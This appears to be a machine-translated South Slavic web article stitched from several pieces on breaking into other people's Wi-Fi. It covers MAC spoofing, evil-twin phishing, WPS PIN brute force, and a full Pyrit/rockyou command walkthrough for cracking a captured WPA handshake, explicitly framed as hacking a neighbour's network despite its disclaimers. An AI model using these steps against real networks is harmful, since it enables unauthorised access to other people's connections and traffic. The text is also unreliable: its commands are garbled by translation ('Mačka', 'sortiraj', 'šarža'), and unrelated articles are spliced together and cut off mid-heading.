Program za gpu nabrajanje wpa ključeva. Hakiranje rukovanja u Pyritu - najbrži način korištenja GPU-a i prethodnog izračunavanja hešova

Pokušajte hakirati Wi-Fi i saznati lozinku za svoju mrežu prema našim uputama kako biste testirali njenu ranjivost! Također, sigurno, mnogi su se našli u situaciji da hitno moraju na internet, a nemaju svoj Wi-Fi. Možda se nađete u nekom drugom gradu ili u posjeti. Povezuje li se vaš laptop, tablet ili pametni telefon na dostupne mreže, ali jesu li svi zaštićeni lozinkom? Ne ljuti se. Ovaj problem se može vrlo jednostavno riješiti.

Načini hakovanja Wi-Fi lozinke

Postoji nekoliko načina da se hakuje obližnji wi-fi:

  • Presretanje i dešifriranje paketa podataka. Da biste razumjeli kako ova metoda funkcionira, morate razumjeti sam princip rada Wi-Fi mreže. Ruter, koji je kablom povezan sa Internetom od provajdera, distribuira ga (Internet) u okolinu. Ako želite da koristite ovaj wi-fi, zahtev sa vašeg računara ili pametnog telefona ide na ruter, gde se proverava lozinka, usled čega se ili povezujete na njega ili ne. Ali čak i nakon uspješne veze, ruter nastavlja razmjenjivati ​​informacije sa svakim uređajem koji je na njega povezan - tzv. paketi podataka. Oni, između ostalog, sadrže lozinku za ruter. Dakle, ako se ovi paketi presretnu ili dešifriraju, lozinku možete saznati iz rutera. Da biste izvršili ovu operaciju, trebat će vam ili visok nivo znanja o računarskoj tehnologiji ili poseban softver.
  • Odabir WPS pristupnog koda. Ponekad, za provjeru uređaja, nije potrebna lozinka, već poseban WPS kod uređaja koji se također bira pomoću programa za hakovanje.
  • Bypass filteri. Da biste se povezali s nekim Wi-Fi pristupnim točkama, nije vam potrebna lozinka, dovoljno je da je vaša mac adresa s bijele liste;
  • Phishing. Nije najjednostavniji, ali veoma efikasan način saznajte lozinku za tuđi Wi-Fi. Suština ove metode je podizanje lažne wifi tačke (istog imena kao ona koja je hakovana), izbacivanje korisnika hakovane pristupne tačke i prikupljanje lozinki kada odbačeni korisnici pokušaju da se povežu na lažnu pristupnu tačku. One. očekivanje da će korisnici zbuniti pristupne tačke i snimiti svoju Wi-Fi lozinku umjesto vas.
  • Izbor lozinki. Ova metoda je mnogo jednostavniji u odnosu na prethodni. Pogledajmo to izbliza.

Važno! Informacije navedene u članku su pregledne prirode; Toplo preporučujemo da ne hakujete WiFi mreže! Ovaj materijal se može koristiti isključivo u obrazovne svrhe za poboljšanje znanja o sigurnosti informacija.

Za početak, trebali biste isprobati najočitije kombinacije poput 12345678, 87654321, itd. Iznenađujuće, mnogi vlasnici bežičnog interneta imaju takve lozinke, a ako govorimo o tome kako hakirati susjedov Wi-Fi, onda će ova metoda sigurno raditi.

Inače, posebno za vas, sastavili smo listu od 30 najpopularnijih korisničkih lozinki, evo je.

Ako ova opcija ne radi, možete koristiti posebne programe za razbijanje Wi-Fi mreže za automatski odabir lozinki. Jednostavno isprobavaju sve moguće kombinacije brojeva i slova, pronalazeći željenu kombinaciju. Često takvi programi rade koristeći takozvane rječnike (najčešće korištene kombinacije login/lozinke) ludom brzinom iu nekoliko stotina niti istovremeno. Proces odabira može trajati od 5 minuta do sat vremena. Da, možda je dugo, dosadno i monotono, ali je efikasno. Evo najčešćih programa za automatski odabir WiFi lozinke:


Povežite se na otvorenu Wi-Fi mrežu promjenom svoje mac adrese

Neki vlasnici Wi-Fi mreže koriste filtriranje mac adresa umjesto lozinki. U tom slučaju, mreža će izgledati otvoreno, dostupno i bez lozinke, ali nećete se moći povezati s njom. Kako hakovati komšiji wifi u tom slučaju? Prvo, morate shvatiti šta je zapravo mac adresa.

Mac adresa je poseban identifikator koji se postavlja zasebno za svaku osobu u računarsku mrežu uređaja. Da biste saznali koje adrese su dozvoljene za određeni ruter, postoje posebni programi skenera koji mogu prikupiti ove informacije iz paketa podataka koje emituje.

Nakon što dobijete ovu informaciju, možete jednostavno promijeniti mac adresu vašeg računala u jednu od dozvoljenih, nakon čega ćete moći koristiti ovaj Wi-Fi.
Možete ga vrlo lako promijeniti. Da biste to učinili, idite na kontrolnu tablu vašeg računara, odaberite Centar za mrežu i dijeljenje, a unutar njega - Promijenite postavke mrežnog adaptera. Ovdje trebate desnim klikom miša kliknuti na mrežnu vezu za koju želite promijeniti mac adresu.
U meniju koji se pojavi potrebna nam je stavka Svojstva, gde na kartici Mreža kliknemo na dugme Konfiguriši. Na kartici Napredno morate da aktivirate Mrežna adresa, zatim unesite novu potrebnu 12-cifrenu mac adresu, kliknite OK i ponovo pokrenite mrežnu vezu.
Nakon što završite ovu proceduru, moći ćete se povezati na bežičnu vezu s već ovlaštenom mac adresom.

Hakovanje wi-fi sa android telefona

Hakovanje Wi-Fi mreža koristeći mobilni telefon pod Android OS-om stvari su nešto gore nego kada koristite desktop računar ili laptop. Stvar je u tome što je napisano vrlo malo alata (softvera) za Android i to prije svega zbog skromnih računarskih mogućnosti mobilnih platformi u odnosu na punopravne računare.
Uprkos ovim aspektima, napisano je nekoliko desetina aplikacija za telefone sa Android OS-om koje mogu ili da pokupe lozinku sa tuđeg wifi-a, ili da pokupe takozvani Pin kod sa Wi-Fi mreže zaštićene WPS WPA enkripcijom.
Za testiranje sigurnosti Wi-Fi mreža, možemo preporučiti korištenje aplikacije pod nazivom. Koristi ovu aplikaciju To je tako jednostavno, evo kratkog vodiča:

  1. Preuzmite aplikaciju i pokrenite je;
  2. Kada prvi put pokrenete Wi-Fi hakerski WPS WPA Connect Dumpper, morate dati dozvolu za korištenje WiFi modula;
  3. Aplikacija će skenirati dostupne Wi-Fi mreže;
  4. Odaberite mrežu sa WPS zaštitom sa liste;
  5. Dodirnite dugme „Izračunaj pin“, zatim „Pokušaj sve“ i sačekajte;
  6. Ako aplikacija uspije pronaći PIN kod sa odabrane mreže, automatski će vas povezati s njom.

Aplikacije za pronalaženje zajedničkih Wi-Fi lozinki

Koliko god čudno zvučalo, često nema potrebe za hakovanjem lozinki sa Wi-Fi mreža - drugi ljudi već imaju zajednički pristup privatnoj Wi-Fi mreži na koju biste se željeli povezati.
Već nekoliko godina postoje posebne aplikacije koje sadrže potrebne informacije za povezivanje s milijunima zatvorenih WiFi mreža. Svakog dana hiljade ljudi dijele prijave i lozinke sa zatvorenih Wi-Fi mreža putem ovih posebnih aplikacija. Pokušajte instalirati jednu od ovih aplikacija i možda nećete morati ništa hakovati:

Usput, neki od ovih programa mogu vam vizualno prikazati dostupne WiFi mreže u blizini na mapi.

Jedno od najpopularnijih softverskih rješenja za odabir wi-fi lozinke je program. Više moguće opcije su . je takođe popularan program za razbijanje lozinki.

Program MAC Address Scanner će biti odlična opcija za pronalaženje mac adresa dozvoljenih za ruter.


Kako zaštititi svoju Wi-Fi mrežu od hakovanja?

Postoji nekoliko jednostavnih koraka koji će vam omogućiti da zaštitite svoju mrežu od neovlaštenih korisnika. Mnogi korisnici ih zanemaruju, uprkos lakoći njihove implementacije. Evo glavnih:

  • Promijenite postavljenu lozinku za pristup sučelju rutera. Podrazumevano postoji fabrička lozinka, koja se lako može pogoditi, a osnovna podešavanja se mogu menjati bez znanja vlasnika.
  • Instalirajte i konfigurirajte enkripciju na nivou WPA2 i odaberite lozinku dužu od 10 znakova. Da, mnogi ljudi postavljaju lozinke koje su jednostavnije ili razumljivije, tako da kasnije ne budu zaboravljene, ili da ih je lako unijeti. Ali možete ga postaviti jednom i smisliti složenu lozinku, čak i nasumični skup slova i brojeva, zapisati je negdje i bit će mnogo teže hakirati vašu kućnu mrežu.
  • Odbijte i onemogućite WPS funkciju, koja pamti povezivanje uređaja i omogućava čak i uređajima trećih strana da se automatski povežu na poznatu mrežu.
  • Onemogući daljinski pristup u admin panelu vašeg rutera i redovno ažurirajte njegov firmver.
  • Aktivirajte funkciju filtriranja povezanih uređaja prema MAC adresama u postavkama rutera, nakon što ste prethodno obavijestili ruter o MAC adresama vaših uređaja.

Kako hakirati Wi-Fi lozinku sa vašeg rutera nakon što slijedite gore navedene preporuke? Nema šanse, to je praktično nemoguće. Ove jednostavne preporuke pomoći će vam da zaštitite svoju kućnu ili radnu mrežu od bilo koje vrste hakovanja, ali povremeno provjeravajte

Prednosti korištenja Pyrita

Hakiranje snimljenih rukovanja je jedini način da se razbije WPA/WPA2 lozinke. Proizvodi se metodom brute force (pretraga lozinkom).

Usput, ako još niste upoznati s tehnikom hvatanja rukovanja, pogledajte članak "".

Pošto upotreba grube sile ne garantuje pozitivan rezultat, izmišljeno je nekoliko tehnika koje mogu značajno povećati šanse za uspjeh. To uključuje:

  • korištenje video kartica za pogađanje lozinki (značajno povećava brzinu pretraživanja)
  • korištenje tablica s unaprijed izračunatim hashovima (povećana brzina + mogućnost ponovne upotrebe za istu pristupnu tačku, mogućnost isprobavanja desetina rukovanja s jedne pristupne točke u nekoliko sekundi)
  • korištenje dobrih rječnika (povećava šanse za uspjeh)

Pyrit može koristiti sve ove tehnike - zato je najbrži kreker lozinki za WPA/WPA2, ili jedan od prva dva zajedno sa oclHashcatom.

I drugi programi implementiraju ove tehnike. Na primjer, i oclHashcat i coWPAtty implementiraju pretraživanje rječnika. coWPAtty implementira prethodno izračunavanje hešova (ali ne podržava upotrebu grafičkih kartica). oclHashcat vam omogućava korištenje snage video kartica, ali ne izračunava unaprijed hešove. Gledajući unaprijed, primijetit ću da u oclHashcatu možete implementirati preliminarni proračun hashova i više puta koristiti dobivene podatke za jednu pristupnu točku za provjeru nekoliko rukovanja bez povećanja vremena za izračunavanje hashova, kako to učiniti će biti opisano kasnije. Aircrack-ng prolazi kroz rečnik i efikasno koristi višejezgarne procesore, ali ne koristi druga "ubrzanja".

Na mom sistemu, oclHashcat vrši grubu silu da razbije WPA/WPA2 lozinke brzinom od 31550 H/s, a Pyrit izračunava hešove brzinom od 38000-40000 PMK. Dalja provjera rukovanja traje manje od jedne sekunde. Iz ovoga se vidi da čak i pri provjeravanju jednog rukovanja povećavamo brzinu za oko trećinu, a ako želimo provjeriti nekoliko rukovanja za jedan AP, onda sa oclHashcatom trebamo početi ispočetka. U Pyritu, svako novo rukovanje traje djelić sekunde.

Da bi Pyrit oslobodio svoju punu snagu, morate imati instalirane vlasničke drajvere za video karticu. Pogledajte članak “” i referenciran materijal u njemu - on vam govori korak po korak o instaliranju drajvera i Pyrit-a u Kali Linux 2 na računaru sa grafičkom karticom iz AMD. Morate slijediti sve korake, a ne samo posljednje instrukcije. Nemam NVidia računar, tako da nemam ažurna uputstva o instalaciji drajvera i Pyrit-a za NVidia sisteme.

Najbrže razbijanje lozinke za WPA/WPA2

Moji početni podaci:

  • napadnut TD - DANIELLE2015
  • poziva se datoteka s prethodno snimljenim rukovanjem DANIELLE2015-01.cap

WPA/WPA2 rječnik krekiranja

Koristit ću rockyou rječnik koji dolazi uz Kali Linux. Ovo je sasvim dovoljno za obuku, ali za praktične napade mogu preporučiti generisane rečnike telefonskih brojeva, generisane rečnike za određene AP u obliku AP_name+cifre, koji popunjavaju pristupnu frazu do osam karaktera.

Kopirajmo najbolju datoteku rječnika u korijenski direktorij.

Cp /usr/share/wordlists/rockyou.txt.gz .

Hajde da ga raspakujemo.

Gunzip rockyou.txt.gz

Budući da minimalna WPA2 lozinka mora imati 8 znakova, hajde da analiziramo datoteku kako bismo filtrirali sve lozinke koje su manje od 8 znakova i više od 63 (zapravo, možete jednostavno preskočiti ovaj red, to je u potpunosti na vama). Tako ćemo sačuvati ovaj fajl kao newrockyou.txt.

Mačka rockyou.txt | sortiraj | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt

Pogledajmo koliko lozinki sadrži ovaj fajl:

Wc -l newrockyou.txt

Sadrži čak 9606665 lozinki.

Originalni fajl sadrži još više.

Wc -l rockyou.txt

Postoji 14344392 lozinki. Dakle, napravili smo ovaj fajl kraćim, što znači da možemo testirati AP u kraćem vremenskom periodu.

Na kraju, preimenujmo ovaj fajl u wpa.lst.

Mv newrockyou.txt wpa.lst

Kreiranje ESSID-a u Pyrit bazi podataka

Sada treba da kreiramo ESSID u bazi podataka Pyrit

Pyrit -e DANIELLE2015 create_essid

NAPOMENA: Ako postoji razmak u imenu AP-a, na primjer “NetComm Wireless”, tada će vaša naredba biti otprilike ovako:

Pyrit -e "NetComm Wireless" create_essid

Sjajno, sada imamo ESSID dodan u Pyrit bazu podataka.

Uvoz rječnika u Pyrit

Sada kada je ESSID dodan u Pyrit bazu podataka, uvezimo naš rječnik lozinki.

Koristite sljedeću naredbu da uvezete unaprijed izgrađeni rječnik lozinki wpa.lst u Pyrit bazu podataka.

Pyrit -i /root/wpa.lst import_passwords

Kreirajte tabele u Pyritu koristeći batch proces

Lako je, samo upišite sljedeću naredbu

Pyrit šarža

Pošto se ova operacija izvodi na laptopu, imam 38000-40000 PMK-a. Ovo je daleko od ograničenja - desktop računari sa dobrom grafičkom karticom pomoći će vam da značajno povećate brzinu ovih proračuna.

Morate paziti koliko je velika vaša datoteka rječnika i koliko su VRUĆI vaš CPU i GPU. Koristite dodatno hlađenje kako biste izbjegli oštećenja.

Proces hakovanja sa Pyritom

Koristićemo napad rukovanja koristeći bazu podataka unapred izračunatih heševa. Nakon što smo završili sve potrebne pripremne korake, pokretanje napada postalo je prilično lako. Samo koristite sljedeću naredbu da započnete proces hakovanja.

Pyrit -r DANIELLE2015-01.cap attack_db

To je to. Cijeli proces, uključujući i preliminarni proračun hešova, trajao je nekoliko minuta. Bilo je potrebno manje od sekunde da se pređe čitava tabela baze podataka da se dohvati lozinka, ako je bila u rečniku. Moja brzina je dostigla 6322696 PMK. Ovo je daleko najbrže.

Ovo traje nekoliko sekundi - tako da se uvijek isplati koristiti ako se lozinka ne pronađe.

Napad rukovanja s rječnikom u Pyritu bez korištenja unaprijed izračunatih tabela

Ako ne želite da kreirate bazu podataka, ali želite direktno da se bavite fajlom rečnika (što je mnogo sporije), možete učiniti sledeće

Pyrit -r DANIELLE2015-01.cap -i /root/wpa.lst attack_passthrough

Koliko je brza ova metoda? 17807 PMK u sekundi. Mnogo sporije za moj ukus.

Čišćenje Pyrita i baze podataka

Na kraju, ako je potrebno, možete ukloniti svoj essid i obaviti čišćenje.

Pyrit -e DANIELLE2015 delete_essid

Ovo će osloboditi dosta prostora na disku.

Na našoj web stranici smo se više puta dotakli teme analize. Danas ćemo vam reći kako da pogodite lozinku za svoju bežičnu WiFi tačku koristeći metodu grube sile. Za ovaj zadatak koristit ćemo procesorsku snagu video kartice. Kao što možda znate, video kartice imaju procesor koji može obavljati operacije s pomičnim zarezom mnogo bolje od centralnog procesora. Ovo je savršeno za brutalnu upotrebu WPAWPA2 lozinki do WiFi pristupnih tačaka. As softver Za naš zadatak koristićemo program pyrit.

Malo o programu:
Pyrit vam omogućava da kreirate ogromne baze podataka za proračune WPA/WPA2-PSK autentifikacije. Iskorištavajući procesorsku snagu višejezgrenih i drugih platformi putem ATI-Stream-a, Nvidia CUDA i OpenCL-a, sada je daleko najmoćniji napad na jedan od najčešće korištenih sigurnosnih protokola u svijetu.


WPA/WPA2-PSK je podskup IEEE 802.11 WPA/WPA2 standarda koji komplikuje distribuciju ključeva i autentifikaciju klijenta dodjeljivanjem unaprijed dijeljenog ključa svakom klijentu koji učestvuje. Ovaj glavni ključ je izveden iz lozinke koju korisnik mora prvo konfigurirati, na primjer, na svom laptopu i pristupnoj tački. Kada laptop kreira vezu sa pristupnom tačkom, novi ključ sesije se izvodi iz glavnog ključa za šifrovanje i autentifikaciju odobriti naknadni promet. “Ušteda” korištenja jednog glavnog ključa umjesto odvojenih ključeva za svakog korisnika pojednostavljuje implementaciju WPA/WPA2 mreža u domovima i malim uredima, po cijenu ranjivosti protokola na grubu silu tokom faze prijenosa ključa. Ovo vam omogućava da u potpunosti otkrijete lozinku koja štiti mrežu.

Koliki je profit? Uporedite broj pmk/s na aircrack-ng i pyrit:

Razumno je napomenuti da su sve radnje izvedene u ubuntu 10.04 R2 x86_64 sa Ati R6950 Twin Frozr III video karticom.
(To jest, sve je tačno za sve sisteme slične ubuntu, posebno za backtrack 5, sa minimalnim razlikama za 32-bitne i 64-bitne sisteme).

Instalacija
Lista potrebnih programa:
1.AMD drajver 11.6
2. AMD APP SDK 2.4 tyrk 1 tyrk 2
3. Pyrit svn checkoutpyrit.googlecode.com/svn/trunk/pyrit_svn
4. Calpp++

1. Instalacija drajvera:

chmod + x ati - drajver - instalater - 11 - 5 - x86 . x86_64 . trči

sudo /ati-driver-installer-11-5-x86. x86_64 . trči

sudo ponovno pokretanje

2. Instaliranje AMD APP SDK 2.4:

cp/home/user/Downloads/AMD-APP-SDK-v2. 4 - lnx64. tgz/home/user

cd /home/user

tar - xvzf AMD - APP - SDK - v2 . 4 - lnx64. tgz

sudo gedit ~/. bashrc

Na dnu ove datoteke dodajte sljedeće redove:

izvoz AMDAPPSDKROOT

izvoz AMDAPPSDKSAMPLESROOT

izvoz AMDAPPSDKROOT=/home/user/AMD-APP-SDK-v2. 4 - lnx64

izvoz AMDAPPSDKSAMPLESROOT=/home/user/AMD-APP-SDK-v2. 4 - lnx64/uzorci

izvoz LD_LIBRARY_PATH = $AMDAPPSDKROOT/lib/x86: $AMDAPPSDKROOT/lib/x86_x64: $LD_LIBRARY_PATH

FIND_LIBRARY (LIB_ATICALCL aticalcl PATHS)

FIND_LIBRARY (LIB_ATICALRT aticalrt PATHS "/home/user/AMD-APP-SDK-v2.4-lnx64/lib/x86_64/")

FIND_PATH (LIB_ATICAL_INCLUDE NAMES cal . h calcl . h PATHS "/home/user/AMD-APP-SDK-v2.4-lnx64/include/CAL")

sudo cmake .

sudo make install

! Promijenite /korisnika/ u svoje korisničko ime
Razumno je napomenuti da gornja opcija radi za sisteme bilo kojeg kapaciteta.

3. Registrirajte icd-registraciju:

tar xfz $ AMDAPPSDKROOT / icd - registracija . tgz

sudo cp $AMDAPPSDKROOT /etc/etc

VAŽNO!
Neki priručnici na engleskom jeziku opisuju instalaciju obje tehnologije koje koriste Ati kartice za direktnu interakciju s karticom, ovo je OpenCL koji je moralno i fizički zastario za ovu stvar, i Calpp sa libboost bibliotekama, koje ćemo koristiti.

4.Calpp instalacija:

sudo apt - get install libboost1 . 40 - sve - dev cmake

tar - xvzf calpp - 0.90.tar.gz

cd calpp - 0,90

sudo gedit CMakeLists . txt

Ispravljamo FIND_LIBRARY na sljedeće vrijednosti:

5.Ugradnja pirita:

sudo apt - get install g++ python - dev zlib1g - dev libssl - dev python - scapy libpcap0 . 8 libpcap0 . 8 - dev libpcap - dev

svn checkout pyrit . googlecode. com/svn/trunk/pyrit_svn

cd/pyrit_svn/pyrit

cd. .

cd cpyrit_calpp

sudo python setup. py build install

Ovim je instalacija završena.
Provjera ispravne instalacije:

2. Pokrenite evaluacijski test:

pyrit benchmark

izlaz (broj pmk/s će prirodno zavisiti od vaše video kartice):

#2: "CPU-Core (SSE2)": 643,5 PMKs/s (RTT 3.0)

Razumno je napomenuti da 1 video kartica zamjenjuje 1 jezgro procesora, tj. ako imate 2 ili više kartica, ili karticu sa dva čipa, onda će izlaz biti ovakav:

# 1 : "CAL++ uređaj #1 " ATI CYPRESS "" : 82426.3 PMKs/s (RTT 2.4)

#2 : "CAL++ uređaj #2 "ATI JUNIPER"" : 41805.7 PMKs/s (RTT 2.6)

#3: "CPU-Core (SSE2)": 655,1 PMKs/s (RTT 3.0)

#4: "CPU-Core (SSE2)": 691,0 PMKs/s (RTT 2.9)

#5 : "Mrežni klijenti" : 0,0 PMKs/s (RTT 0,0)

VAŽNO!
U Pyritu možete kreirati cijele baze podataka unaprijed kompajliranih heševa za pogađanje lozinke. Postoje 2 opcije za pohranjivanje i korištenje ovih baza podataka:
Opcija 1- pohranjivanje baze podataka u korisnikov skriveni home folder. Ja to zovem mobilnim, tj. preuzima se fajl sa 1 milion lozinki koje se često pojavljuju, nakon čega se u njega dodaju svi esidovi radi brze provjere (1 milion riječi + 1 essid na mojoj kartici je otprilike minut vremena).

Pros:
Jednom sam uploadovao fajl sa lozinkom i zaboravio ga (možete uploadati koliko god želite, ali NIJE preporučljivo)
Bilo koji broj esida sa bilo kojim imenima
Mala vremenska investicija

Cons:
Kada koristite rječnike od više od 20 miliona i najmanje 10 različitih esida, troši se mnogo više vremena.

Zaključak- prednosti se glatko prelivaju u nedostatke i obrnuto. Želeo bih da napomenem da je ovo idealna opcija ako imate moćan rečnik od do 1 milion reči, koji će vam omogućiti da velikom brzinom proveravate različite .cap datoteke.
Primjer upotrebe:
analizirati

pirit - r cap - 01.cap - b 00 : 11 : 22 : 33 : 44 : 55 attack_batch

pyrit - r cap - 01.cap attack_batch

Opcija 2- pohranjivanje baze podataka u bilo koji specificirani korisnički folder. Ovo je temeljitiji pristup poslovanju. Omogućava vam da kreirate bazu podataka za određene eside i određeni broj lozinki, tj. preuzima se fajl sa 100 miliona lozinki, nakon čega se u njega dodaju svi esidi sa jedinstvenim imenima. Nakon toga se baza podataka sastavlja i povezuje sa određenim esidima koje ste u nju postavili. Nakon kompilacije, brzina se povećava za 5-7 puta. Reći ćete da je to odlična opcija, i bićete u pravu, ali, naravno, postoji kvaka :) kvaka je u vremenu kompilacije, koje prirodno ovisi o broju lozinki i esida i dugo traje.

Pros:
Recimo da se 1 baza podataka na 10 jedinstvenih esida može koristiti za bilo koju pristupnu tačku, pod uslovom da naziv tačke odgovara onome što se nalazi u bazi podataka. One. ako dva vaša susjeda imaju naziv pristupne točke dlink, ali prirodno različite mac adrese, to vas NEĆE spriječiti da ih pretražujete u vašoj bazi podataka bez potrebe da kreirate novu bazu podataka.
Brzina
Ogromna brzina
Napravio sam 1 bazu podataka za najuobičajenije eside i provjerim ih u bilo kojem trenutku u minimalnom vremenu!!! količine.

Cons:
Vrijeme kompajliranja
Zauzima puno prostora na tvrdom disku.

Zaključak- suve činjenice o mojoj bazi podataka: 850 miliona reči, 24 esida, 32 sata kompilacije, 650.000 pmk/s pretraživanja kroz bazu, težina 240 gb.
Naravno, sa manjim brojem lozinki i esida vremenski troškovi se smanjuju u direktnoj proporciji. Da li se isplati ili ne, svako odlučuje za sebe.
Primjer upotrebe:whereeval

pyrit - u fajl : / / / putanja/ do/ datoteke/ gdje će biti/ baza podataka. db - r / putanja / do / datoteke / iz / kap / izlaz - 01.cap attack_db

Zaključak
Onima koji se stalno/profesionalno bave odabirom Wi-Fi lozinki, prisustvo ovakvih programa znatno olakšava život. Danas je grijeh ne iskoristiti svu snagu svog hardvera, nije uzalud nadogradnja :) ( Da vas još jednom podsjetim na razliku - gruba sila na procesor ~3.000 pmk/s, gruba sila na video karticu ~85.000 pmk/s). Nekoliko riječi o analogima - ovo je program commview za wifi, napravljen za Windows, nisam ga vidio niti dirao, jer smrdi, ne koristim Windows. To se, naravno, plaća (500$ profita).

Pozdrav svima, danas bih vam htio reći šta da radite ako ste zaboravili lozinku za svoju wi-fi mrežu. Ovdje nema ništa komplikovano i ovaj problem možete riješiti za nekoliko minuta.

Pokazat ću sve radnje na Windows 10 i pokazati vam 2 metode. Hajdemo sada na posao!

1 Metod

Da bismo povratili vašu zaboravljenu lozinku za Wi-Fi, potreban nam je samo jedan računar povezan na vašu mrežu. Kliknite desnim tasterom miša na ikonu "Pristup Internetu" i izaberite "Centar za mrežu i deljenje".

U prozoru koji se otvori kliknite na "Promijeni postavke adaptera".

Pojavit će se još jedan prozor u kojem desnom tipkom miša kliknemo na našu vezu i izaberemo “Status”.

Pred vama će se otvoriti prozor statusa bežične mreže. Tamo možete vidjeti detaljne informacije o vašoj wi-fi mreži. Sada kliknite na “Svojstva bežične mreže”.

U novom prozoru koji se otvori idite na karticu "Sigurnost" i označite okvir pored riječi "Prikaži unesene znakove". Nakon toga, u polju “Network Security Key” moći ćete vidjeti svoju zaboravljenu lozinku. I obavezno to zapišite na komad papira da ne zaboravite ponovo. 🙂

Kada sve uradite, možete zatvoriti sve prozore koje ste otvorili.

2 Metod

Ako vam prva metoda nije pomogla, izvolite;)

Prvo provjerite da li je ruter kablom povezan sa računarom. Nakon ovoga morat ćete otići do lični račun vaš modem. Da biste to učinili, morate saznati IP adresu svog modema. Obično se može naći na dnu vašeg rutera.

IP adresu unosimo u adresnu traku pretraživača i pojavljuje se prozor za autorizaciju. Prijava i lozinka za sve su standardni "admin".

Nakon toga ulazimo u lični račun vašeg rutera. (Može vam izgledati drugačije.) U lijevom meniju kliknite na “Wireless Mode” i u podmeniju odaberite “Wireless Protection”. Podrazumevano zaštita bi trebala biti WPA-PSK/WPA2-PSK. Vaša lozinka bi trebala biti upisana u polje “PSK Password”, koju možete promijeniti u nešto drugo.

I, kao i uvijek, možete pogledati video „Kako saznati zaboravljena lozinka sa wi-fi mreže."

Ako vam je ovaj članak ili video bio koristan, ostavite komentar ispod ovog članka.

Ne tako davno se činilo da je bežična mreža zaštićena WPA2 tehnologijom prilično sigurna. Pronalaženje jednostavnog ključa za povezivanje je zaista moguće. Ali ako instalirate zaista dug ključ, onda vam ni dugine tablice, pa čak ni GPU ubrzanje neće pomoći da to popravite. Ali, kako se ispostavilo, možete se povezati na bežičnu mrežu i bez toga - koristeći prednosti nedavno otkrivene ranjivosti u WPS protokolu.

UPOZORENJE

Sve informacije su predstavljene samo u obrazovne svrhe. Prodiranje u tuđu bežičnu mrežu lako se može smatrati krivičnim djelom. Misli svojom glavom.

Cijena pojednostavljenja

Sve je manje otvorenih pristupnih tačaka na koje uopće ne morate unijeti ključ da biste se povezali. Čini se da bi uskoro mogli biti uvršteni u Crvenu knjigu. Ako ranije osoba možda nije ni znala da se bežična mreža može zaključati ključem, štiteći se od vanjskih veza, sada mu se sve više govori o ovoj mogućnosti. Uzmi barem prilagođeni firmver, koje izdaju vodeći provajderi za popularne modele rutera radi pojednostavljenja podešavanja. Morate navesti dvije stvari - prijavu/lozinku i... ključ za zaštitu bežične mreže. Što je još važnije, sami proizvođači hardvera pokušavaju učiniti proces postavljanja jednostavnim. Stoga većina modernih rutera podržava mehanizam WPS (Wi-Fi Protected Setup). Uz njegovu pomoć korisnik može postaviti sigurnu bežičnu mrežu za nekoliko sekundi, a da se uopće ne zamara činjenicom da “treba omogućiti šifriranje negdje drugdje i registrirati WPA ključ”. Uneo sam osmocifreni simbolični PIN u sistem, koji je napisan na ruteru, i gotovi ste! I evo, drži se čvrsto. U decembru su dva istraživača govorila o ozbiljnim fundamentalnim nedostacima u WPS protokolu. To je kao stražnja vrata za bilo koji ruter. Ispostavilo se da ako je WPS aktiviran na pristupnoj tački (koja je za trenutak uključena u većini rutera prema zadanim postavkama), tada možete odabrati PIN za konekciju i izvući ključ za povezivanje za nekoliko sati!

Kako radi WPS?

Ideja kreatora WPS-a je dobra. Mehanizam automatski postavlja naziv mreže i šifriranje. Dakle, korisnik ne mora ulaziti u web sučelje i baviti se složenim postavkama. I možete lako dodati bilo koji uređaj (na primjer, laptop) u već konfiguriranu mrežu: ako ispravno unesete PIN, on će dobiti sva potrebna podešavanja. Ovo je vrlo zgodno, zbog čega svi glavni igrači na tržištu (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) sada nude bežični ruteri sa WPS podrškom. Pogledajmo to malo detaljnije.

Postoje tri opcije za korištenje WPS-a:

  1. Push-Button-Connect (PBC). Korisnik pritisne posebno dugme na ruteru (hardver) i na računaru (softver), čime se aktivira proces podešavanja. Nas ovo ne zanima.
  2. Unošenje PIN koda u web interfejs. Korisnik pristupa administrativnom interfejsu rutera preko pretraživača i unosi osmocifreni PIN kod ispisan na telu uređaja (slika 1), nakon čega dolazi do procesa podešavanja. Ova metoda je prikladnija za početnu konfiguraciju rutera, pa je nećemo ni razmatrati.
  3. Unošenje PIN koda na računar korisnika (slika 2). Kada se povezujete na ruter, možete otvoriti posebnu WPS sesiju, u okviru koje možete konfigurirati ruter ili dobiti postojeća podešavanja ako ispravno unesete PIN kod. Ovo je već privlačno. Za otvaranje takve sesije nije potrebna autentifikacija. Ovo može svako! Ispostavilo se da je PIN kod već potencijalno podložan napadu bruteforce. Ali ovo je samo cveće.

Ranjivost

Kao što sam ranije napomenuo, PIN kod se sastoji od osam cifara - dakle, postoji 10^8 (100.000.000) opcija za podudaranje. Međutim, broj opcija se može značajno smanjiti. Činjenica je da je posljednja cifra PIN koda neka vrsta kontrolne sume, koja se izračunava na osnovu prvih sedam cifara. Kao rezultat, već dobijamo 10^7 (10.000.000) opcija. Ali to nije sve! Zatim pažljivo pogledamo uređaj WPS protokola za autentifikaciju (slika 3). Čini se kao da je posebno dizajniran da ostavi mjesta za grubu silu. Ispostavilo se da se provjera PIN koda provodi u dvije faze. Podijeljen je na dva jednaka dijela, a svaki dio se provjerava posebno! Pogledajmo dijagram:

  1. Ako je nakon slanja M4 poruke napadač dobio EAP-NACK kao odgovor, onda može biti siguran da je prvi dio PIN koda netačan.
  2. Ako je primio EAP-NACK nakon slanja M6, onda je, shodno tome, drugi dio PIN koda netačan. Dobijamo 10^4 (10.000) opcija za prvu polovinu i 10^3 (1.000) za drugu. Kao rezultat, imamo samo 11.000 opcija za kompletnu pretragu. Da biste bolje razumjeli kako će ovo funkcionirati, pogledajte dijagram.
  3. Važna stvar je moguća brzina pretraživanja. Ograničeno je brzinom kojom ruter obrađuje WPS zahtjeve: neke pristupne točke će proizvoditi rezultate svake sekunde, druge svakih deset sekundi. Većina vremena se troši na izračunavanje javnog ključa koristeći Diffie-Hellman algoritam, on se mora generirati prije koraka M3. Vrijeme utrošeno na ovo može se smanjiti odabirom jednostavnog tajnog ključa na strani klijenta, što će pojednostaviti proračune drugih ključeva u budućnosti. Praksa pokazuje da je za uspješan rezultat obično dovoljno proći samo polovicu svih opcija, a grubom silom u prosjeku je potrebno samo četiri do deset sati.

Prva implementacija

